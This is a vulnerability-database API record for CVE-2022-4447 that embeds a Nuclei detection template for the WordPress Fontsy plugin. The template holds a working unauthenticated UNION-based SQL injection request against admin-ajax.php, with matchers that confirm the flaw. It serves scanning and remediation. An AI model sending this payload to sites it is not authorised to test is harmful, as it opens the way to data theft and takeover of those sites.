{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-4447/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-4447/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-4447/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-4447/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-4447/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-4447"},"sightings":{"href":"/api/v1/sightings/cve-2022-4447"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-4447.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-4447\n\ninfo:\n  name: WordPress Fontsy <=1.8.6 - SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action.  An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.\n  remediation: |\n    Update the Fontsy plugin to the latest version (>=1.8.7) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability.\n  reference:\n    - https://wpscan.com/vulnerability/6939c405-ac62-4144-bd86-944d7b89d0ad\n    - https://wordpress.org/plugins/fontsy/\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-4447\n    - https://github.com/ARPSyndicate/kenzer-templates\n    - https://github.com/cyllective/CVEs\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-4447\n    cwe-id: CWE-89\n    epss-score: 0.04756\n    epss-percentile: 0.91541\n    cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: fontsy_project\n    product: fontsy\n    framework: wordpress\n  tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project,vkev,vuln\nvariables:\n  num: \"999999999\"\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        id=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"text/html\")'\n          - 'contains(body, \"{{md5(num)}}\")'\n        condition: and\n# digest: 490a0046304402201fd2181cf73ba8250d9710e671361a430305806f6e796e9f8e4eec1ddbe00713022035d5f878eafb072125d9f6f3d6a0d9d916195895370e3b1267f778800c031124:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2022-4447"}